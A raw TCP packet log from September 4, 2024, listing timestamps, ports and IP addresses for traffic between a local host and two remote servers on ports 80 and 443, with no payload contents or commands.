Sep 4, 2024 17:37:08.146925926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146933079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146945000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.146946907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146971941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.146992922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147031069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147043943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147054911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147067070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147073030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147078037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147083044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147089958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147103071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147110939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147126913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147154093 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147170067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147181988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147192001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147205114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147228003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147546053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147558928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147568941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147579908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147591114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147592068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147605896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.147619009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147641897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.147998095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148009062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148019075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148029089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148039103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148039103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148051977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148055077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148063898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148076057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148087025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148092985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148092985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148098946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148113012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148124933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148125887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148137093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148154020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148161888 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148307085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148319006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148329020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148346901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148359060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148633957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148679972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148842096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148859024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148869991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148881912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148888111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148893118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148899078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148905993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148925066 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148942947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.148962021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148972988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148983955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148993969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.148999929 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149005890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149007082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149019003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149027109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149029970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149044037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149059057 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149066925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149086952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149095058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149099112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149132013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149149895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149604082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149616003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149626017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149636984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149646997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149648905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149677992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149689913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.149745941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149759054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.149794102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.155057907 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.155075073 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.155126095 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.155136108 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.155144930 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.155167103 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.157533884 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.157552004 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.157599926 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.157608032 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.157644987 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.159691095 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.159706116 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.159755945 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.159763098 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.159799099 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.163414955 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.163429022 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.163476944 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.163485050 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.163520098 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.165647984 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.165663004 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.165714025 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.165721893 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.165733099 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.165757895 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.169145107 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.169159889 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.169204950 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.169215918 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.169250011 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.169677973 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.169692993 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.169738054 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.169744968 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.169763088 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.169784069 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.170798063 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.170814037 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.170860052 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.170866966 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.170905113 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.171967030 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.171982050 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.172025919 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.172033072 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.172045946 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.172068119 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.173027039 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.173042059 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.173089981 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.173096895 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.173135996 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.173823118 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.173839092 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.173883915 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.173894882 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.173929930 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.213356972 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.213373899 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.213424921 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.213433027 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.213473082 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.213659048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.213689089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.213707924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.213720083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.213723898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.213732958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.213743925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.213752031 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.213756084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.213763952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.213769913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.213783979 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.213793993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.213814020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.214106083 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.214121103 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.214170933 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.214178085 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.214211941 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.214720011 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.214735985 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.214775085 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.214786053 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.214797020 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.214817047 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.215029001 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.215044022 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.215087891 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.215092897 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.215127945 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.215801001 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.215816021 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.215864897 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.215872049 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.215908051 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.216377974 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.216392040 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.216439962 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.216447115 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.216492891 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.216861010 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.216876984 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.216917992 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.216926098 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.216959953 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.223345995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223397017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223438025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223450899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223485947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223524094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223535061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223546028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223557949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223567963 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223567963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223581076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223582983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223611116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223623037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223649979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223660946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223694086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223772049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223783016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223793030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223803043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223814011 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223818064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223831892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223856926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223881006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223923922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.223944902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223957062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223965883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.223985910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224009037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224077940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224090099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224101067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224111080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224121094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224122047 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224136114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224164009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224217892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224229097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224237919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224250078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224261045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224261045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224272013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224272013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224301100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224313974 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224376917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224415064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224427938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224440098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224467993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224551916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224564075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224575043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224586010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224596024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224601030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224613905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224632978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224684954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224695921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224725962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224816084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224828005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224837065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224848032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224859953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224864006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224870920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224885941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.224888086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224900007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.224920034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225066900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225080013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225090027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225100994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225111008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225111008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225121975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225132942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225147009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225171089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225348949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225361109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225369930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225382090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225392103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225400925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225408077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225413084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225425005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225434065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225434065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225445986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225445986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225461006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225471973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225476980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225483894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225491047 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225497961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225503922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225516081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225527048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.225528955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225548029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.225573063 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226059914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226072073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226082087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226097107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226106882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226109028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226118088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226129055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226134062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226140976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226154089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.226154089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.226161003 CEST	49719	80	192.168.2.6	147.45.44.104
